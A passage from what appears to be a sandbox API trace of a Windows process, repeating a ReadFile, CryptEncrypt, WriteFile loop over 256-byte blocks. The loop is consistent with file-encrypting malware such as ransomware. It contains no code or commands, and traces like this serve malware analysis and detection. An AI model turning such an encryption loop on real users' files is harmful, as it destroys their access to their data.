WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.622] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.622] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.622] GetLastError () returned 0x0 [0143.622] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.622] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.622] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.622] GetLastError () returned 0x0 [0143.622] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.622] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.622] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.622] GetLastError () returned 0x0 [0143.622] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.622] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.622] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.622] GetLastError () returned 0x0 [0143.622] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.622] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.622] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.622] GetLastError () returned 0x0 [0143.622] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.623] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.623] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.623] GetLastError () returned 0x0 [0143.623] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.623] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.623] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.623] GetLastError () returned 0x0 [0143.623] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.623] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.623] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.623] GetLastError () returned 0x0 [0143.623] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.623] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.623] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.623] GetLastError () returned 0x0 [0143.623] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.623] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.623] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.623] GetLastError () returned 0x0 [0143.623] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.623] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.623] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.623] GetLastError () returned 0x0 [0143.623] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.623] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.624] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.624] GetLastError () returned 0x0 [0143.624] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.624] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.624] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.624] GetLastError () returned 0x0 [0143.624] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.624] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.624] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.624] GetLastError () returned 0x0 [0143.624] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.624] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.624] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.624] GetLastError () returned 0x0 [0143.624] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.624] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.624] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.624] GetLastError () returned 0x0 [0143.624] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.624] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.624] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.624] GetLastError () returned 0x0 [0143.624] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.624] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.624] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.624] GetLastError () returned 0x0 [0143.624] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.625] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.625] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.625] GetLastError () returned 0x0 [0143.625] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.625] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.625] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.625] GetLastError () returned 0x0 [0143.625] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.625] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.625] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.625] GetLastError () returned 0x0 [0143.625] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.625] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.625] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.625] GetLastError () returned 0x0 [0143.625] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.625] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.625] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.625] GetLastError () returned 0x0 [0143.625] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.625] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.625] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.625] GetLastError () returned 0x0 [0143.625] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.625] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.626] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.626] GetLastError () returned 0x0 [0143.626] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.626] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.626] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.626] GetLastError () returned 0x0 [0143.626] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.626] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.626] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.626] GetLastError () returned 0x0 [0143.626] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.626] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.626] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.626] GetLastError () returned 0x0 [0143.626] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.626] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.626] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.626] GetLastError () returned 0x0 [0143.626] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.626] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.626] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.626] GetLastError () returned 0x0 [0143.626] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.626] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.626] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.626] GetLastError () returned 0x0 [0143.626] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.627] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.627] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.627] GetLastError () returned 0x0 [0143.627] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.627] ReadFile (in: hFile=0x780, 